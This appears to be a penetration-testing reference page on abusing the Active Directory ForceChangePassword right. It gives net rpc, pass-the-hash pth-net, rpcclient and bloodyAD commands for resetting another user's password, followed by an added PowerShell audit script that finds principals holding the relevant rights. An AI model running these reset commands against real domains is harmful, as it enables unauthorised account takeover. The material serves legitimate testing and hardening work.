ForceChangePassword
This abuse can be carried out when controlling an object that holds GenericAll, AllExtendedRights or the User-Force-Change-Password extended right over the target user.
It can also be achieved from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients. The pth-toolkit can also be used to run net commands with pass-the-hash.

```bash
# With net and cleartext credentials (the password will be prompted for)
net rpc password "$TargetUser" -U "$DOMAIN"/"$USER" -S "$DC_HOST"

# With net and cleartext credentials supplied on the command line
net rpc password "$TargetUser" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"

# With pass-the-hash (LM hash left empty, followed by the NT hash)
pth-net rpc password "$TargetUser" -U "$DOMAIN"/"$USER"%"ffffffffffffffffffffffffffffffff":"$NT_HASH" -S "$DC_HOST"
```
rpcclient can also be used on UNIX-like systems when the samba-common-bin package is missing.

```bash
# Open an authenticated RPC session to the domain controller, then set the target's password
# (info level 23 carries the new password)
rpcclient -U "$DOMAIN"/"$ControlledUser" "$DomainController"
rpcclient $> setuserinfo2 "$TargetUser" 23 "$NewPassword"
```
Alternatively, it can be achieved using bloodyAD.

```bash
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
```
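As an added audit check (not part of the original page), the PowerShell below lists which principals hold any of the three rights named above on user objects under an OU, so that unexpected holders can be reviewed and the ACEs removed. It assumes the RSAT ActiveDirectory module (which provides the `AD:` drive); the search base and the expected-holder list are placeholders.

```powershell
# Added example, not from the original page: list principals that hold GenericAll,
# AllExtendedRights or User-Force-Change-Password on user objects under an OU.
# Assumes the RSAT ActiveDirectory module (which provides the AD: drive); the
# search base and expected-holder list below are placeholders to adjust.
Import-Module ActiveDirectory

# Well-known GUID of the User-Force-Change-Password extended right, and the
# all-zero GUID an ACE uses to grant every extended right (AllExtendedRights).
$ForceChangePasswordGuid = [Guid]'00299570-246d-11d0-a768-00aa006e0529'
$AllExtendedRightsGuid   = [Guid]'00000000-0000-0000-0000-000000000000'
$ADRights = [System.DirectoryServices.ActiveDirectoryRights]

function Get-ForceChangePasswordHolders {
    param(
        [Parameter(Mandatory)] [string]$SearchBase,
        # Principals that legitimately hold the right (placeholder); anything else is reported.
        [string[]]$ExpectedHolders = @('NT AUTHORITY\SYSTEM')
    )
    foreach ($user in Get-ADUser -Filter * -SearchBase $SearchBase) {
        # The object's ACL already contains ACEs inherited from parent containers.
        $acl = Get-Acl -Path ("AD:\" + $user.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $matched = $null
            if ($ace.ActiveDirectoryRights.HasFlag($ADRights::GenericAll)) {
                $matched = 'GenericAll'
            } elseif ($ace.ActiveDirectoryRights.HasFlag($ADRights::ExtendedRight)) {
                if ($ace.ObjectType -eq $AllExtendedRightsGuid) { $matched = 'AllExtendedRights' }
                elseif ($ace.ObjectType -eq $ForceChangePasswordGuid) { $matched = 'User-Force-Change-Password' }
            }
            if (-not $matched) { continue }
            if ($ExpectedHolders -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Target    = $user.SamAccountName
                Principal = $ace.IdentityReference.Value
                Right     = $matched
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Review each row: remove the ACE, or document why the principal needs the right.
Get-ForceChangePasswordHolders -SearchBase 'OU=Users,DC=example,DC=local' | Format-Table -AutoSize
```

Inherited rows usually point at an ACE set on a parent OU rather than on the user itself, so fix them at the container where they were granted.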